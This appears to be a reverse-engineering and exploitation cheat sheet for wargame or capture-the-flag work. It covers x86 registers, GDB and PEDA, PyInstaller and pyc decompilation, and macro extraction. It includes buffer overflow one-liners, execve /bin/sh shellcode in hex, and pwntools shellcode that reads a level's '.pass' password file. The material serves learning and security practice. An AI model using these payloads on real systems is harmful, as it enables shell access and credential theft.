HackSheet


ASM

Variables

| x64 | x32 | What is it? |
|:---:|:---:|-------------|
| RAX | EAX | Return value |
| RCX | ECX | Counter (or fourth arg) |
| RDX | EDX | Third arg |
| RSI | ESI | Second arg |
| RDI | EDI | First arg of function |
| RSP | ESP | Stack pointer |
| RIP | EIP | Next instruction |
| R8-R11 | r8d-r11d | Scratch register |
| R12-R15 | r12d-r15d | Preserved register |

Source

Operation

| Operation | Explanation |
|:----------|-------------|
| MOV size dest,src | dest ← src |
| LEA dest,[op] | dest ← addr op |
| PUSH op | Increase RSP & store op |
| POP op | Load op & decrease RSP |
| | |
| ADD op1,op2 | op1 ← op1 + op2 |
| SUB op1,op2 | op1 ← op1 - op2 |
| NEG reg | reg ← -reg |
| INC reg | reg ← reg + 1 |
| DEC reg | reg ← reg - 1 |
| | |
| AND op1,op2 | op1 ← op1 & op2 |
| OR op1,op2 | op1 ← op1 \| op2 |
| XOR op1,op2 | op1 ← op1 ^ op2 |
| | |
| CMP op1,op2 | op1 - op2 |
| TEST op1,op2 | op1 & op2 |
| JMP op | Jump to op |

Source - Page 21

Overflow

Basic

(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")  # Python 2: str + struct.pack() only works there

Shellcode

(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")  # Python 2: 21-byte shellcode + padding to 100 + return address

Shellcode

Cat

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"

Exec sh 1

python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"

Exec sh 2

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
21

GDB

Command

b *0x12345678      # Breakpoint
b strcpy           # Breakpoint
r                  # Run program
r < <(echo lol)    # Run with pipe
r arg1 arg2        # Run with arg
c                  # Continue
n                  # Next operation
set $eax=0x00      # Set register
info registers     # Show registers

Print

x/s "string"
x/d 53
x/x 0xff
help x

print $rax

Get env address

x/10s **(char***)&environ

Peda

Install

git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

Binary ninja

Scrape code from HTML

// Run in the browser console: collect the text of every linear-disassembly
// line, one line of output per .LinearDisassemblyLine element
let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
  [...parent_elmt.children].forEach(children_elmt => {
    result += children_elmt.textContent;
  });
  result += '\n';
});
console.log(result);

Lib Injection

Decompile Python Executable

Convert executable into .pyc

git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec

Disassembly .pyc (compatible python 3.9.2)

git clone https://github.com/zrax/pycdc
cd pycdc
cmake .
make
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassembly
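Before running pyinstxtractor, it helps to confirm that a sample really is a PyInstaller bundle and which Python version it was built with (pycdc support depends on it). The added script below is not part of the cheat sheet or of pyinstxtractor; it reads the CArchive cookie that PyInstaller appends to the executable (assumed layout: 8-byte magic, package length, TOC offset, TOC length, Python version, 64-byte library name) and builds a constructed sample to check itself against.

```python
import struct

# PyInstaller CArchive cookie (assumed layout for PyInstaller 2.1 and later)
PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"          # magic, pkg_len, toc_pos, toc_len, pyvers, pylib_name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes


def find_pyinstaller_cookie(data: bytes):
    """Return (python_major, python_minor, pylib_name) when `data` carries a
    plausible PyInstaller cookie, otherwise None."""
    pos = data.rfind(PYINST_MAGIC)
    if pos == -1 or pos + COOKIE_SIZE > len(data):
        return None                      # no magic, or cookie truncated
    _magic, pkg_len, toc_pos, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, data, pos)
    # Sanity checks: the package must fit in the file and the TOC inside the package
    if pkg_len > len(data) or toc_pos + toc_len > pkg_len:
        return None
    # Version field: 39 means 3.9 in older bootloaders, 309 / 311 in newer ones
    if pyver >= 100:
        major, minor = divmod(pyver, 100)
    else:
        major, minor = divmod(pyver, 10)
    return major, minor, pylib.rstrip(b"\x00").decode()


def make_sample(pyver: int, pylib: bytes = b"python39.dll") -> bytes:
    """Constructed sample: filler body, fake packed data, fake TOC, then the cookie."""
    body = b"\x7fELF" + b"\x00" * 64        # not a real ELF, just filler
    toc = b"\x00" * 16                      # fake empty TOC
    archive = b"\x01" * 32 + toc            # fake packed entries followed by the TOC
    pkg_len = len(archive) + COOKIE_SIZE    # package length includes the cookie
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, pkg_len,
                         len(archive) - len(toc), len(toc), pyver,
                         pylib.ljust(64, b"\x00"))
    return body + archive + cookie


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        print(find_pyinstaller_cookie(f.read()))
```

A result of `None` on a real sample means it is either not PyInstaller-packed or packed with a bootloader whose cookie layout differs, so pyinstxtractor is the wrong first step.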

Macro Office PPTM

Install

sudo pip3 install oletools

Extract VBA macro source from PPTM

olevba -c file.pptm